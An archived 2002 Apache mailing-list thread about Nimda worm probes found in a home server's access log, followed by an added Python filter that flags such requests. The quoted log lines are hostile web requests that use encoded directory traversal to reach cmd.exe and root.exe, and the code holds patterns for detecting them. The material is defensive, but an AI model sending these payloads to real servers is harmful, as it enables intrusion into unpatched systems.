httpd-users mailing list archives

From "David Kramlich" <daves...@bellsouth.net>
Subject Re: access log
Date Fri, 19 Apr 2002 15:28:37 GMT
Some firewalls and routers have routines to block the scans you see in your
logs. Check with the manufacturer of your router or build a Linux router or
purchase a cheap Cisco router w/12.1.2 IOS or higher to accomplish this.
----- Original Message -----
From: "Mike Hodson" <mike@mystica.cx>
To: <users@httpd.apache.org>; <r.douglass@onlinehome.de>
Sent: Friday, April 19, 2002 6:36 AM
Subject: Re: access log


> These are the telltale symptoms of someone on the internet who has the
> NIMDA internet worm, which thankfully only affects Microsoft IIS users.
> Though having countless log entries from this crap undoubtedly affects
> all of us, Unix users included.
>
> Odds are it is someone who uses the same ISP you do, but they either
> have no clue it is on their systems, or have not yet run the latest
> patches/virus scanners. It's not your problem, and it's probably not
> theirs either. I've had 170,000 log entries from NIMDA, and there are no
> signs it's even slowing down. :(
>
>
> On Fri, 19 Apr 2002 10:43:04 +0200
> "Robert Douglass" <r.douglass@onlinehome.de> wrote:
>
> > Hello, I've been hosting a tiny website from my home for the past week, as a
> > temporary project, and I found the following in my access log:
> >
> > "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
> > "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
> > "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> > "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> > "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> > "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> > "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> > "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
> > "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
> > "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
> > "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> > "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> >
> > Does anybody have an idea what someone was trying to accomplish with this,
> > or if these requests may have originated from my ISP? Does anybody have any
> > suggestions on how to implement some basic security (I've done nothing!) to
> > protect myself? I'm using Apache 1.3.22. Thank you,
> >
> > Robert Douglass
> >
> >
> > ---------------------------------------------------------------------
> > The official User-To-User support forum of the Apache HTTP Server Project.
> > See <URL:http://httpd.apache.org/userslist.html> for more info.
> > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > For additional commands, e-mail: users-help@httpd.apache.org
>
> --
> Mike Hodson  <mike@mystica.cx>
> IRC: irc.mystica.cx #mystica or /msg me if I'm not actively talking.
> ICQ: 18145059
>
>


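Added example, not part of the thread or of any poster's code: a Python filter that flags probes like the ones quoted above in an access log by percent-decoding each request path until it stops changing, then counts them per client and lists any that were answered with a 2xx status. The log lines are a constructed sample (request lines taken from the thread, addresses and timestamps made up), and the function names and tag names are this example's own.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample (Common Log Format): request lines are from the thread;
# client addresses (RFC 5737 documentation ranges) and timestamps are made up.
SAMPLE_LOG = '''
192.0.2.10 - - [19/Apr/2002:10:01:00 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
192.0.2.10 - - [19/Apr/2002:10:01:01 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
192.0.2.10 - - [19/Apr/2002:10:01:02 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
192.0.2.10 - - [19/Apr/2002:10:01:03 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
198.51.100.7 - - [19/Apr/2002:10:02:00 +0200] "GET /index.html HTTP/1.0" 200 1043
'''
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+$')

def decode_fully(path, max_rounds=4):
    """Percent-decode until stable; return (decoded path, rounds that changed it)."""
    for rounds in range(max_rounds):
        nxt = unquote(path, encoding="latin-1")  # latin-1 keeps every byte visible
        if nxt == path:
            return path, rounds
        path = nxt
    return path, max_rounds

def classify(url):
    """Return the set of probe indicators found in one request URL."""
    decoded, rounds = decode_fully(url.split("?", 1)[0])
    tags = set()
    if re.search(r'(cmd|root)\.exe$', decoded, re.I):
        tags.add("shell-binary")
    if rounds > 1:                        # e.g. %255c -> %5c -> backslash
        tags.add("double-encoding")
    if re.search(r'[\xc0\xc1]', decoded):  # 0xC0/0xC1 never occur in valid UTF-8
        tags.add("bad-utf8-lead")
    if re.search(r'\.\.[/\\]', decoded):
        tags.add("traversal")
    return tags

def summarize(log_text):
    """Count flagged requests per client; collect flagged lines that got a 2xx."""
    hits, served = Counter(), []
    for line in log_text.strip().splitlines():
        m = LINE_RE.match(line)
        if m and classify(m.group(3)):
            hits[m.group(1)] += 1
            if m.group(4).startswith("2"):
                served.append(line)
    return hits, served

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

An empty second result means every flagged request was refused (404 or 400), as in the log excerpt in the thread.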

